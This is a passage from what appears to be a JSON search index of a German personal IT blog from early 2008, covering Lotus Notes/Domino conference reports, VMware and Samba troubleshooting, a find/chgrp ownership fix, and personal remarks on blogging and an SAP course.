Zoom-Stufen, aus mehreren Perspektiven sowie in einer Weitwinkelansicht betrachten kann.\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003cp\u003eRadialnet 0.4 visualisiert Nmap-Scans im Detail « NEWS « Linux-Magazin\nOnline\u003c/p\u003e\n\u003cp\u003eBlogged with Flock\u003c/p\u003e\n\u003cp\u003eTags: Linux, Netzwerk\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-02-15-radialnet-04-visualisiert-nmap-scans-im-detail--news--linux-magazin-online/","title":"Radialnet 0.4 visualisiert Nmap-Scans im Detail « NEWS « Linux-Magazin Online"},{"body":"Private Verwendung des Notes Clients : “Immer wieder taucht die Frage auf, ob man den Notes Client auch privat verwenden kann, hier die Klärung. Ist ein Mitarbeiter über sein Unternehmen korrekt lizensiert, dann kann dieser Mitarbeiter den Notes Client ebenso privat verwenden, für den Zugriff auf sein Unternehmens-Mailfile, als auch für den Zugriff auf sein privates Mailfile.\n“\n(Via Lotus Germany .)\nSuper! Endlich ist das mal klargestellt!\n","excerpt":"\u003cp\u003e\u003ca href=\"http://connections.euluc.com/blogs/lotusgermany/entry/private_verwendung_des_notes_clients\" target=\"_blank\"\u003ePrivate\nVerwendung des Notes Clients \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n: “Immer wieder taucht die Frage auf, ob\nman den Notes Client auch privat verwenden kann, hier die Klärung. Ist\nein Mitarbeiter über sein Unternehmen korrekt lizensiert, dann kann\ndieser Mitarbeiter den Notes Client ebenso privat verwenden, für den\nZugriff auf sein Unternehmens-Mailfile, als auch für den Zugriff auf\nsein privates Mailfile.\u003cbr\u003e\n“\u003c/p\u003e\n\u003cp\u003e(Via \u003ca href=\"http://connections.euluc.com/blogs/lotusgermany/\" target=\"_blank\"\u003eLotus Germany \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.)\u003c/p\u003e\n\u003cp\u003eSuper! Endlich ist das mal klargestellt!\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-02-14-private-verwendung-des-notes-clients/","title":"Private Verwendung des Notes Clients"},{"body":"So die LCTY 2008, also die Lotusphere Comes To You 2008 bei Techdata Midrange und Edcom ist beendet. Die letzten beiden Tage waren voller interessanter Themen, die ja auch schon in den ersten beiden Posts zu diesem Thema etwas näher beschrieben wurden.\nIch habe mir zum Abschluß noch den Vortrag von Volker Weber “Social Networks – Knowledgemanagement 2.0?” angehört und war danach in der Single Sign On – Session von Alexander Staat Edcom ). Beides hochinteressant, ich überlege noch, wann und wie wir das in der Firma umsetzen könnten. Ich denke aber, daß man gerade mit Wikis und Blogs viel Wissen aus den Köpfen der Benutzer für den Rest der Firma verfügbar machen könnte.\nGerade bei der Einführung dieser “Web 2.0” Komponenten sollte aber, meiner Meinung nach, der Startschuß (neudeutsch Kickoff) für dieses Projekt nicht aus den Reihen der IT kommen, sondern aus dem Anwenderkreis.\nInteressant ist hier z.B. der Post im Lotes Blog von heute vormittag.\nSingle Sign On ist leider noch nicht implementiert, es soll aber in Lotus Domino 8.5 eine Authentifizierung über Active Directory, Lotus Domino und Lotus Webapplications (Lotus Connections , Websphere, Sametime ) möglich sein. Ich bin gespannt, da die bisherigen Ansätze mit AD Sync leider nicht überzeugen konnten.\nIn der Schlußsession wurde noch ein Blackberry 8800 verlost, leider war ich nicht der Gewinner :-)\nWeiter so Da bleibt mir eigentlich nur noch, dem Edcom Team zu danken, es war eine tolle Veranstaltung, die fundiert Neuerungen präsentiert hat und auch den Kontakt mit Kollegen und Freunden, die man sonst nur am Telefon hört, nicht zu kurz kommen lies.\nÄhnliche Artikel LCTY 2008 – 1. Tag LCTY 2008 – 2. Tag vormittag ","excerpt":"\u003cp\u003eSo die LCTY 2008, also die Lotusphere Comes To You 2008 bei Techdata\nMidrange und \u003ca href=\"http://www.edcom.de\" target=\"_blank\"\u003eEdcom \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n ist beendet. Die letzten beiden\nTage waren voller interessanter Themen, die ja auch schon in den ersten\nbeiden Posts zu diesem Thema etwas näher beschrieben wurden.\u003c/p\u003e\n\u003cp\u003eIch habe mir zum Abschluß noch den Vortrag von\n\u003ca href=\"http://www.vowe.net\" target=\"_blank\"\u003eVolker Weber \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n “Social Networks – Knowledgemanagement\n2.0?” angehört und war danach in der Single Sign On – Session von\nAlexander Staat \u003ca href=\"http://www.edcom.de\" target=\"_blank\"\u003eEdcom \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n). Beides hochinteressant, ich\nüberlege noch, wann und wie wir das in der Firma umsetzen könnten. Ich\ndenke aber, daß man gerade mit Wikis und Blogs viel Wissen aus den\nKöpfen der Benutzer für den Rest der Firma verfügbar machen könnte.\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-02-14-lcty-2008-finale/","title":"LCTY 2008 Finale"},{"body":"Lotus Traveler in 8.0.1 update : “When Domino 8.0.1 ships next week, one of the anticipated new features is Lotus Notes Traveler, the new server add-in task to provide out-of-the-box mobile support for Windows Mobile devices.\n(Via Ed Brill .)\nCoole Sache. Wie angekündigt wird nächste Woche Lotus Domino 8.0.1 freigegeben. Der Lotus Traveler als neuer Pushdienst für Win CE Devices sieht zumindest für gewisse Grundfunktionalitäten sehr gut aus.\n","excerpt":"\u003cp\u003e\u003ca href=\"http://www.edbrill.com/ebrill/edbrill.nsf/dx/lotus-traveler-in-8.0.1-update?opendocument\u0026amp;comments\" target=\"_blank\"\u003eLotus\nTraveler in 8.0.1 update \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n: “When Domino 8.0.1 ships next week, one of\nthe anticipated new features is\n\u003ca href=\"http://www-306.ibm.com/software/lotus/products/notes/traveler.html\" target=\"_blank\"\u003eLotus\nNotes Traveler, \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n the new server add-in task to provide out-of-the-box\nmobile support for Windows Mobile devices.\u003c/p\u003e\n\u003cp\u003e(Via \u003ca href=\"http://www.edbrill.com/ebrill/edbrill.nsf/\" target=\"_blank\"\u003eEd Brill \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.)\u003c/p\u003e\n\u003cp\u003eCoole Sache. Wie angekündigt wird nächste Woche Lotus Domino 8.0.1\nfreigegeben. Der Lotus Traveler als neuer Pushdienst für Win CE Devices\nsieht zumindest für gewisse Grundfunktionalitäten sehr gut aus.\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-02-14-lotus-traveler-in-801/","title":"Lotus Traveler in 8.0.1"},{"body":"Der 2. Tag begann für mich leider mit einer Zugverspätung wegen Gleisbruch. Nach vier Stunden Schlaf war das aber kein großes Problem.\nDie erste Session von Alex Staat (Edcom) über Debugging von Server Crashes habe ich zur Hälfte versäumt, aber die Präsentation und der Teil den ich gesehen habe war sehr gut.\nIch blieb dann im Admin Panel sitzen und habe als nächstes Lotus Traveler bzw. Notes Mobile Devices von Alex Novak (Edcom) gehört, da wir nicht die großen Mobile-Anforderungen im Unternehmen haben, war es “nice to know” aber ich kann es leider nicht in die Praxis umsetzen.\nSehr interessant war die Session “Deploying Domino 8” von Chip Carter (IBM). Er hatte verschiedene gute Tipps für das Vorgehen beim Rollout von Version 8.x.\n","excerpt":"\u003cp\u003eDer 2. Tag begann für mich leider mit einer Zugverspätung wegen\nGleisbruch. Nach vier Stunden Schlaf war das aber kein großes Problem.\u003c/p\u003e\n\u003cp\u003eDie erste Session von Alex Staat (Edcom) über Debugging von Server\nCrashes habe ich zur Hälfte versäumt, aber die Präsentation und der Teil\nden ich gesehen habe war sehr gut.\u003c/p\u003e\n\u003cp\u003eIch blieb dann im Admin Panel sitzen und habe als nächstes Lotus\nTraveler bzw. Notes Mobile Devices von Alex Novak (Edcom) gehört, da wir\nnicht die großen Mobile-Anforderungen im Unternehmen haben, war es “nice\nto know” aber ich kann es leider nicht in die Praxis umsetzen.\u003c/p\u003e\n\u003cp\u003eSehr interessant war die Session “Deploying Domino 8” von Chip Carter\n(IBM). Er hatte verschiedene gute Tipps für das Vorgehen beim Rollout\nvon Version 8.x.\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-02-14-lotusphere-2008-comes-to-you-2-tag/","title":"Lotusphere 2008 comes to You – 2. Tag"},{"body":"Die diesjährige Lotusphere Comes to You 2008 war sehr gut besucht und die ersten Vorträge, die ich bisher gehört habe waren sehr vielversprechend. Die Keynote sprach nach der Eröffnungssession von Volker Weber und Otto Förg (Edcom ), wie auch die letzten beiden Jahre, Ron Sebastian von IBM .\nDie Neuerungen waren absolut cool. Gerade im Bereich Web 2.0, Social-Networks und Erweiterung bestehender Konzepte konnte die Keynote überzeugen. Sametime etwa bekommt Schnittstellen zu Telefonanlagen und kann auch zum Anruf-Routing verwendet werden. Ich hoffe, daß diese Funktionen auch auf den Nec Philips Anlagen benutzbar sind.\nTrotz der vielen Ankündigungen und Neuerungen im letzten Jahr, war auch dieses Mal viel Neues zu sehen. Es waren v.a. keine “Zeichentischapplikationen”, die nur auf Papier bestehen, sonder bereits funktionierender Code, der in diesem Jahr ausgeliefert werden soll.\nComposite Applications wurden von Niklas Heidloff (IBM) vorgestellt und zeigen ziemlich viel Potential zur Kombination verschiedener Anwendungen, Datenbanken und Lotus Notes. Mashup und Widgets halten Einzug in Lotus Notes. Viele der Neuerungen werden im Composite Applications Blog gepostet.\nEs wurde u.a. gezeigt wie einfach es auch für den Anwender ist, in Lotus 8.0.1 Daten aus verschiedenen Ansichten, Anwendungen und Website zu verknüpfen. Die Anzeige der Adresse aus einem CRM System in Google Maps war da ein alter Hut. Es ist möglich über Texterkennung auch Aktienkurse, Flugpläne oder ähnliches mit einem Klick anzuzeigen.\nChip Carter sprach im Anschluß über die Neuerungen bei der Administration. Hier fielen vor allem die Möglichkeit der dynamischen Policies auf, die dann auch auf Gruppen angewendet werden können und sich dynamisch beim Gruppenwechsel ändern. Der ID Vault als Ersatz bzw. Ergänzung des ID Recovery verspricht einiges, allerdings ist diese Funktion erst in Domino 8.5 enthalten und war für die Vorführung noch nicht komplett verfügbar.\nDie Session von Irene Ros (IBM) über “Worst and Best Practice in Domino Administration” zeigt das neue Tool DCT (Domino Config Tuner), das auch außerhalb von Domino Maintance Releases aktualisiert wird und die aktuelle Konfiguration nach veralteten Einträgen, fehlerhaften oder unsinnigen Einstellungen in der Notes.ini und der restlichen Konfiguration. Ich empfinde das als nur mäßig interessantes Tool. Klar verschiedene Tippfehler und veraltete Einträge werden gefunden, aber den Rest sollte ein Admin schon selbst im Griff haben. Ein neues Wiki wurde gezeigt, in dem Best Practice Tasks recherchiert werden können.\nDie letzte Session, die ich besuchte, hielt dann Christian Holsing (IBM) über die Integration von SAP in Lotus Notes. Die alten Techniken, wie LEI und NASs (Kommunikation über BAPI und RFC Schnittstellen) wurden gezeigt, aber auch Ausblicke auf die, von SAP und Lotus / IBM gemeinsam, entwickelte Applikation Atlantic.\nDer Abschluß war ein Sechs-Gänge-Menü im Master’s Home München. Eine tolle Möglichkeit gut zu essen und mit Gleichgesinnten über Lotus Notes / Domino fachzusimpeln.\nMenü Kalbfleisch mit Thunfischsoße\nSteinpilzsoufflet\nTortellini mit Trüffelfüllung\nRotbarsch mit Kartoffel-Karottenpüree\nHirschrücken mit Bratkartoffeln\nHeidelbeer-Masquarpone-Creme mit Erdbeeren und Heidelbeeren in Schokomuffin\nDer erste Tag war also wie erwartet gut und übertraf sogar meine Erwartungen. Ich habe viele neue Ideen präsentiert bekommen und hoffe daß ich einiges davon auch umsetzen kann.\n","excerpt":"\u003cp\u003eDie diesjährige\n\u003ca href=\"http://www.edcom.de/edcom/web/edcomcms.nsf/id/LCTY_LTCYHome?open\u0026amp;ccm=000\" target=\"_blank\"\u003eLotusphere\nComes to You 2008 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n war sehr gut besucht und die ersten Vorträge, die ich\nbisher gehört habe waren sehr vielversprechend. Die Keynote sprach nach\nder Eröffnungssession von Volker Weber und Otto Förg\n(\u003ca href=\"http://www.edcom.de\" target=\"_blank\"\u003eEdcom \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n), wie auch die letzten beiden Jahre, Ron\nSebastian von \u003ca href=\"http://www.ibm.com\" target=\"_blank\"\u003eIBM \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eDie Neuerungen waren absolut cool. Gerade im Bereich Web 2.0,\nSocial-Networks und Erweiterung bestehender Konzepte konnte die Keynote\nüberzeugen. Sametime etwa bekommt Schnittstellen zu Telefonanlagen und\nkann auch zum Anruf-Routing verwendet werden. Ich hoffe, daß diese\nFunktionen auch auf den Nec Philips Anlagen benutzbar sind.\u003c/p\u003e\n\u003cp\u003eTrotz der vielen Ankündigungen und Neuerungen im letzten Jahr, war auch\ndieses Mal viel Neues zu sehen. Es waren v.a. keine\n“Zeichentischapplikationen”, die nur auf Papier bestehen, sonder bereits\nfunktionierender Code, der in diesem Jahr ausgeliefert werden soll.\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-02-14-lotusphere-comes-to-you-2008-edcom-munchen/","title":"Lotusphere Comes to You 2008 – Edcom München"},{"body":"Heute hatte einer unserer Server (Windows 2003 auf Vmware ESX 3.x) einen Hänger. Dummerweise lief auf der Kiste Lotus Domino und nichts ging mehr. Der Domino Dienst wollte nicht mehr starten. Zuerst dachte ich an einen Domino-Fehler, aber weder ein manueller Start, noch die diversen Workarounds mit ncompact etc. von der Konsole brachten den Server wieder hoch.\nIch hab dann man die komplette Serversoftware neuinstalliert, dann die notes.ini nochmals überprüft, Servertasks deaktiviert, aber der Server ging nicht über die Startmeldung mit der Versionsnummer hinaus. Immer an dem Punkt an dem der Rollback über logasio starten sollte, blieb der Server einfach hängen.\nDomino Version ist 7.0.2 mit Fixpack 2, nach der Installation von Fixpack 3 änderte sich nichts.\nAlso mal den Virenscanner deinstalliert, das Ergebnis war eine zusätzliche Zeile beim Start, aber sonst nichts.\nDann fiel mir ein, daß ich vor ein paar Wochen schonmal einen Server hatte, der zwar per IP, RDP oder ähnlichem erreichbar war, aber keine Gruppenrichtlinien, WSUS-Updates etc. integrierte. Also die Kiste raus aus der Domäne und wieder rein – halt, der Rechner wollte sich nicht mehr in die Domäne integrieren, irgendein seltsamer Endpunktfehler. Nach mehreren Versuchen hab ich die Vmwaretools deinstalliert, die Netzwerkkarte gelöscht und rebootet. Nach der Neuinstallation der Tools ging alles performant und ohne Fehlermeldung.\nAlso auch hier mal die Vmwaretools deinstalliert. Reboot und dann? Die Vmwaretools wollten sich nicht mehr installieren lassen. OK, dann erstmal ohne Vmwaretools den Domino starten, er lief, aber ungefähr so als wäre er auf einem Pocket PC installiert. Performance unter aller Sau. Ich hab dann das windows.iso aus dem vmutils Verzeichnis per Loopback gemountet und das Setup auf den Server kopiert. Installation gestartet, die Vmwaretools wurden fehlerfrei installiert und nach dem x-ten Reboot an diesem Nachmittag fuhr der Dominoserver wie gewohnt hoch und lief auch in einer erwarteten Geschwindigkeit.\nDiese beiden Vorfälle haben mich ziemlich gestört, da ich mit dem ESX eine Erleichterung erwartet habe und nicht zusätzliche Fehlerquellen. Wenn mir das nochmal passiert, dann ist es für mich das Aus von Vmware für produktive Maschinen.\n","excerpt":"\u003cp\u003eHeute hatte einer unserer Server (Windows 2003 auf Vmware ESX 3.x) einen\nHänger. Dummerweise lief auf der Kiste Lotus Domino und nichts ging\nmehr. Der Domino Dienst wollte nicht mehr starten. Zuerst dachte ich an\neinen Domino-Fehler, aber weder ein manueller Start, noch die diversen\nWorkarounds mit ncompact etc. von der Konsole brachten den Server wieder\nhoch.\u003c/p\u003e\n\u003cp\u003eIch hab dann man die komplette Serversoftware neuinstalliert, dann die\nnotes.ini nochmals überprüft, Servertasks deaktiviert, aber der Server\nging nicht über die Startmeldung mit der Versionsnummer hinaus. Immer an\ndem Punkt an dem der Rollback über logasio starten sollte, blieb der\nServer einfach hängen.\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-02-12-kurioses-windows-unter-vmware-esx/","title":"Kurioses Windows unter Vmware ESX"},{"body":"Datenschutzalarm: US-Zöllner durchstöbern Laptops und Handys – Netzwelt – SPIEGEL ONLINE – Nachrichten : “an US-Flughäfen begeistert und hemmungslos digitale Daten ausgeforscht und oft auch kopiert werden. Manchmal werden Laptops auch einfach beschlagnahmt, und mancher Geschäftsreisende sah den Firmenrechner anschließend nie mehr wieder. Nicht nur Computer interessieren die Grenzschützer in den USA – auch Handys und sogar MP3-Player nehmen sie sich vor, auf der Suche nach verdächtigem Material.”\nSchon ziemlich dreist was sich die US Grenzschützer da so erlauben. Für mich ein Grund mehr dieses Land nicht zu besuchen! Mich würden zwar verschiedene Landstriche wirklich interessieren, aber ich noch mehr Länder nicht, bei denen ein Besuch lohnt.\n(Via Stoibär .)\n","excerpt":"\u003cp\u003e\u003ca href=\"http://www.spiegel.de/netzwelt/mobil/0,1518,533812,00.html\" target=\"_blank\"\u003eDatenschutzalarm:\nUS-Zöllner durchstöbern Laptops und Handys – Netzwelt – SPIEGEL ONLINE –\nNachrichten \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n: “an US-Flughäfen begeistert und hemmungslos digitale Daten\nausgeforscht und oft auch kopiert werden. Manchmal werden Laptops auch\neinfach beschlagnahmt, und mancher Geschäftsreisende sah den\nFirmenrechner anschließend nie mehr wieder. Nicht nur Computer\ninteressieren die Grenzschützer in den USA – auch Handys und sogar\nMP3-Player nehmen sie sich vor, auf der Suche nach verdächtigem\nMaterial.”\u003c/p\u003e\n\u003cp\u003eSchon ziemlich dreist was sich die US Grenzschützer da so erlauben. Für\nmich ein Grund mehr dieses Land nicht zu besuchen! Mich würden zwar\nverschiedene Landstriche wirklich interessieren, aber ich noch mehr\nLänder nicht, bei denen ein Besuch lohnt.\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-02-09-gehts-eigentlich-noch/","title":"Geht’s eigentlich noch?"},{"body":"So,\njetzt habe ich für ein paar Wochen Affili.net als Werbepartner ausprobiert und bin leider gar nicht überzeugt. Mit Google Adsense hatte ich wenigsten 5€ Einnahmen im Monat und konnte die Unkosten der Webseite begleichen, aber mit den Affili.net Werbebanner war das Ergebnis leider gleich null!\nMal sehen, ob ich nochmal mit Google Adsense rumprobiere oder einfach ohne Werbung weiterblogge.\n","excerpt":"\u003cp\u003eSo,\u003c/p\u003e\n\u003cp\u003ejetzt habe ich für ein paar Wochen Affili.net als Werbepartner\nausprobiert und bin leider gar nicht überzeugt. Mit Google Adsense hatte\nich wenigsten 5€ Einnahmen im Monat und konnte die Unkosten der Webseite\nbegleichen, aber mit den Affili.net Werbebanner war das Ergebnis leider\ngleich null!\u003c/p\u003e\n\u003cp\u003eMal sehen, ob ich nochmal mit Google Adsense rumprobiere oder einfach\nohne Werbung weiterblogge.\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-01-31-werbung-und-blog/","title":"Werbung und Blog"},{"body":"Bei einer Rücksicherung unseres Samba-Shares kam es zu Berechtigungsproblemen, da einer Gruppe Berechtigungen nicht über die Posix ACL, sondern über die Besitzergruppe zugeteilt wurde. Da bei der Rücksicherung ein Teil der Gruppen auf 10007 gesetzt wurden, mußte diese GID mit der Standardgruppe überschrieben werden, allerdings nicht für den kompletten Tree, sondern vereinzelt.\nIch habe die Besitzer über find ersetzt:\nfind /Pfad/ -gid 10007 -exec chgrp -v Defaultgruppe {} \\;\nHier sollte man v.a. beachten, dass zwischen \\{} und ein Leerzeichen sein muß!\n","excerpt":"\u003cp\u003eBei einer Rücksicherung unseres Samba-Shares kam es zu\nBerechtigungsproblemen, da einer Gruppe Berechtigungen nicht über die\nPosix ACL, sondern über die Besitzergruppe zugeteilt wurde. Da bei der\nRücksicherung ein Teil der Gruppen auf 10007 gesetzt wurden, mußte diese\nGID mit der Standardgruppe überschrieben werden, allerdings nicht für\nden kompletten Tree, sondern vereinzelt.\u003c/p\u003e\n\u003cp\u003eIch habe die Besitzer über find ersetzt:\u003c/p\u003e\n\u003cblockquote\u003e\n\u003cp\u003e\u003ccode\u003efind /Pfad/ -gid 10007 -exec chgrp -v Defaultgruppe {} \\;\u003c/code\u003e\u003c/p\u003e\u003c/blockquote\u003e\n\u003cp\u003eHier sollte man v.a. beachten, dass zwischen \\{} und  ein Leerzeichen\nsein muß!\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-01-31-linux-dateiberechtigung-ersetzen/","title":"Linux Dateiberechtigung ersetzen"},{"body":"Ich habe gestern aus alter Gewohnheit auf unserem Samba die Option veto files = .* eingestellt.\nDie Fehlermeldung folgte heute bei unseren Mac OS X – Usern, die mit komischen Fehlermeldungen das Speichern verweigerten.\nFehlermeldungen im M$ Word war:\n“Datei lässt sich nicht speichern oder erstellen. Datenträger ist schreibgeschützt oder kein Speicherplatz vorhanden. Versuchen Sie Folgendes: …”\nund im Finder beim Kopieren auf das Laufwerk:\n“Einige Objekte können nicht an den Zielort kopiert werden, da für den Zielort die Namen zu lang sind oder ungültige Zeichen enthalten. Möchten Sie sie überspringen und die restlichen Objekte kopieren?”\nDie Ursache habe ich inzischen auch gefunden, da Mac OS X bei jedem Speicher- oder Kopiervorgang entweder die Datei .DS-Store schreibt bzw. ändert und außerdem Dateien mit ._Dateiname im gleichen Verzeichnis zur gespeicherten / kopierten Datei ablegt.\n","excerpt":"\u003cp\u003eIch habe gestern aus alter Gewohnheit auf unserem Samba die Option \u003ccode\u003eveto files = .*\u003c/code\u003e eingestellt.\u003c/p\u003e\n\u003cp\u003eDie Fehlermeldung folgte heute bei unseren Mac OS X – Usern, die mit komischen Fehlermeldungen das Speichern verweigerten.\u003c/p\u003e\n\u003cp\u003eFehlermeldungen im M$ Word war:\u003c/p\u003e\n\u003cp\u003e“Datei lässt sich nicht speichern oder erstellen. Datenträger ist schreibgeschützt oder kein Speicherplatz vorhanden. Versuchen Sie Folgendes: …”\u003c/p\u003e\n\u003cp\u003eund im Finder beim Kopieren auf das Laufwerk:\u003c/p\u003e\n\u003cp\u003e“Einige Objekte können nicht an den Zielort kopiert werden, da für den Zielort die Namen zu lang sind oder ungültige Zeichen enthalten. Möchten Sie sie überspringen und die restlichen Objekte kopieren?”\u003c/p\u003e\n\u003cp\u003eDie Ursache habe ich inzischen auch gefunden, da Mac OS X bei jedem Speicher- oder Kopiervorgang entweder die Datei .DS-Store schreibt bzw. ändert und außerdem Dateien mit .\u003cem\u003e_Dateiname\u003c/em\u003e im gleichen Verzeichnis zur gespeicherten / kopierten Datei ablegt.\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-01-29-samba-shares-unter-mac-os-x/","title":"Samba Shares unter Mac OS X"},{"body":"Heute habe ich bei Eumel einen Link für den Speedtest.Schnell-schreiben.de gefunden und habe auf Anhieb ein für mich ganz gutes Ergebnis bekommen:\nUpdate (2) 66 Wörter\n","excerpt":"\u003cp\u003eHeute habe ich bei \u003ca href=\"http://eumel59.de\" target=\"_blank\"\u003eEumel \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n einen Link für den\nSpeedtest.Schnell-schreiben.de gefunden und habe auf Anhieb ein für mich\nganz gutes Ergebnis bekommen:\u003c/p\u003e\n\u003ch1 id=\"update-2\"\u003eUpdate (2) \u003ca href=\"#update-2\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003e66 Wörter\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-01-12-eumel-geschlagen-im-tippen/","title":"Eumel geschlagen (im Tippen)"},{"body":"So,\nmein erster Vorsatz für das neue Jahr ist erledigt.\nIch habe das Blitzblank Theme von Jochen Bauer , das auf Yaml basiert, an meine Bedürfnisse angepaßt und online gestellt. Ich bin bisher sehr zufrieden, falls Unstimmigkeiten auftreten, bitte kurzen Kommentar oder Mail an mich.\nDie Grafik im Kopf des Blogs zeigt übrigens die Krautinsel. Die Krautinsel ist die dritte Insel im Chiemsee und sie ist unbewohnt. Sie befindet sich zwischen Frauen- und Herreninsel und wird im Sommer als Viehweide genutzt.\n","excerpt":"\u003cp\u003eSo,\u003c/p\u003e\n\u003cp\u003emein erster Vorsatz für das neue Jahr ist erledigt.\u003c/p\u003e\n\u003cp\u003eIch habe das \u003ca href=\"http://www.blogatelier.de/blitzblank\" target=\"_blank\"\u003eBlitzblank Theme \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n von\n\u003ca href=\"http://www.blogatelier.de/\" target=\"_blank\"\u003eJochen Bauer \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, das auf\n\u003ca href=\"http://www.yaml.de\" target=\"_blank\"\u003eYaml \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n basiert, an meine Bedürfnisse angepaßt und\nonline gestellt. Ich bin bisher sehr zufrieden, falls Unstimmigkeiten\nauftreten, bitte kurzen Kommentar oder Mail an mich.\u003c/p\u003e\n\u003cp\u003eDie Grafik im Kopf des Blogs zeigt übrigens die Krautinsel. Die\nKrautinsel ist die dritte Insel im Chiemsee und sie ist unbewohnt. Sie\nbefindet sich zwischen Frauen- und Herreninsel und wird im Sommer als\nViehweide genutzt.\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-01-12-neues-theme-online/","title":"Neues Theme online"},{"body":"Hallo zusammen,\nerstmal willkommen 2008. Ich hatte die letzten Tage Urlaub und dadurch nicht die Muse einen Artikel im Blog zu posten.\nFür dieses Jahr plane ich ein paar Änderungen. An den Wichtigsten arbeite ich bereits und hoffe daß ich sie bald aktivieren kann.\nEigenes Theme: Ich bastle gerade an einem eigenem Theme, das auf Yaml basiert und dadurch in allen Browsern dargestellt werden kann.\nEigene Zeichnungen: Ich habe schon immer gerne gezeichnet, mir aber nie die Mühe gemacht, das zu üben. Seit ein paar Wochen skizziere ich fleissig mit Blei- und Graphitstiften. Außerdem habe ich mir ein neues Grafiktablett geleistet und hoffe demnächst kleine Zeichnungen, Karrikaturen oder Comics posten zu können.\nAlso bis demnächst.\n","excerpt":"\u003cp\u003eHallo zusammen,\u003c/p\u003e\n\u003cp\u003eerstmal willkommen 2008. Ich hatte die letzten Tage Urlaub und dadurch\nnicht die Muse einen Artikel im Blog zu posten.\u003c/p\u003e\n\u003cp\u003eFür dieses Jahr plane ich ein paar Änderungen. An den Wichtigsten\narbeite ich bereits und hoffe daß ich sie bald aktivieren kann.\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003e\n\u003cp\u003eEigenes Theme: Ich bastle gerade an einem eigenem Theme, das auf\n\u003ca href=\"http://www.yaml.de\" target=\"_blank\"\u003eYaml \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n basiert und dadurch in allen Browsern\ndargestellt werden kann.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eEigene Zeichnungen: Ich habe schon immer gerne gezeichnet, mir aber\nnie die Mühe gemacht, das zu üben. Seit ein paar Wochen skizziere ich\nfleissig mit Blei- und Graphitstiften. Außerdem habe ich mir ein neues\nGrafiktablett geleistet und hoffe demnächst kleine Zeichnungen,\nKarrikaturen oder Comics posten zu können.\u003c/p\u003e","ref":"https://stoeps.de/posts/2008/2008-01-04-neues/","title":"Neues"},{"body":"So, jetzt bin ich endlich fertig mit dem Kurs \u0026ldquo;Netweaver Überblick\u0026rdquo; in Walldorf.\nErst dachte ich ja, daß meine Kollegen übertreiben, aber es ist schon komisch in Walldorf. Auf der einen Seite sieht man ein altes verschlafenes Städtchen mit einer Unmenge an Kneipen, Restaurants und Hotels. Auf der anderen Seite ist der \u0026ldquo;SAPplex\u0026rdquo; neben der Autobahn. Ein riesiges Gelände in Glas und Metall, den man nach einem kurzen Spaziergang über abgeerntete Felder erreichen kann.\nMontag abend war ich Heidelberg in der Fussgängerzone und bin von einem Weihnachts-/Christkindlmarkt zum Nächsten gegangen. Das war wirklich schön und die Kulisse mit der beleuchteten Burg und den vielen Weihnachtslichtern war einfach toll.\nDer Kurs war leider enttäuschend. Ich habe eine technische Einführung erwartet und bekommen hab ich ein \u0026ldquo;Verkaufsgespräch\u0026rdquo; über die Supertechnik von Netweaver (\u0026ldquo;Sie können das machen und das…\u0026rdquo;, \u0026ldquo;Workflows sind möglich\u0026rdquo;, \u0026ldquo;Collaboration ist eingebaut\u0026rdquo;). Immer wenn es interessant geworden wäre, hieß es: \u0026ldquo;Für eine weitere Vertiefung ist leider keine Zeit.\u0026rdquo; Es gab also nur einen theoretischen Überblick und die Beispiele waren entweder mau oder sie funktionierten nicht, da \u0026ldquo;die Trainingsumgebung dafür nicht vorbereitet ist\u0026rdquo;. Das muß man schon verstehen, schließlich ist die neue Umgebung erst das 2. Mal für diesen Kurs im Einsatz.\nÜber den Sinn von den Collaboration-Anwendungen läßt sich meiner Meinung nach streiten, da die meisten Firmen SAP bereits einsetzen und nicht die gewohnten Strukturen von Lotus Notes / Sametime oder MS Exchange / Sharepoint wegwerfen, nur weil man jetzt auch den Netweaver zum Chatten für Instantmessaging verwenden kann. 